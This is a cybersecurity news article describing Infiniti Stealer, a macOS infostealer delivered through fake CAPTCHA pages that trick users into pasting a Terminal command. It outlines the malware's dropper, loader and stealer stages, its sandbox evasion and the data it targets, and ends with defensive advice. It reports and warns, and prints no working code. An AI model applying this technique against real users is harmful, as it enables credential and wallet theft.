A new macOS infostealer called Infiniti Stealer is being spread through fake Cloudflare-style CAPTCHA pages, marking a shift in social engineering attacks targeting Apple users.
Initially identified as “NukeChain” during threat hunting, the malware was later confirmed after its operator panel became publicly accessible.
Unlike traditional malware that exploits software vulnerabilities, Infiniti Stealer uses a method called ClickFix. This technique tricks users into running malicious commands themselves, allowing the attack to bypass many security systems.
The attack starts with a fake verification page hosted on domains like update-check[.]com. It mimics a Cloudflare CAPTCHA and asks users to verify identity by opening Terminal and pasting a command. The command uses a base64-encoded URL to fetch a remote script and silently begin the infection process.
Since users execute the command manually, the activity appears legitimate and avoids detection. The method, earlier seen on Windows, is now adapted for macOS with instructions like using Command + Space to open Terminal.
The malware works in 3 stages.
Stage 1: Bash Dropper
A Bash script decodes a hidden payload, writes a second file to the /tmp directory, removes Apple’s quarantine flag using xattr, and runs it in the background using nohup. It also sends command-and-control details, deletes itself, and closes the Terminal.
Stage 2: Nuitka Loader
A compiled Mach-O binary of about 8.6 MB, built using Nuitka, runs next. It converts Python code into C, making it harder to analyse. The file includes a “KAY” header and extracts around 35 MB of data before launching the final payload.
Stage 3: Python Stealer Payload
The final file, UpdateHelper[.]bin, is a Python 3.11-based infostealer. It targets browser data, macOS Keychain entries, cryptocurrency wallets, and developer secrets in .env files. It also captures screenshots and sends data through HTTP POST requests.
Before stealing data, the malware checks for analysis tools like Any.Run, Joe Sandbox, Hybrid Analysis, VMware, and VirtualBox, and adds random delays to avoid detection. It then alerts the operator via Telegram and prepares stolen data for further use.
This campaign highlights a growing threat to macOS systems, challenging the belief that Apple devices are less vulnerable. It also reinforces that no legitimate CAPTCHA will ever ask users to paste commands into Terminal.
Users who interacted with such pages should stop sensitive activities, change passwords from a clean device, revoke sessions and keys, check folders like /tmp and ~/Library/LaunchAgents/, and run a full system scan.
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream LinkedIn | The Mainstream Facebook | The Mainstream Youtube | The Mainstream Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
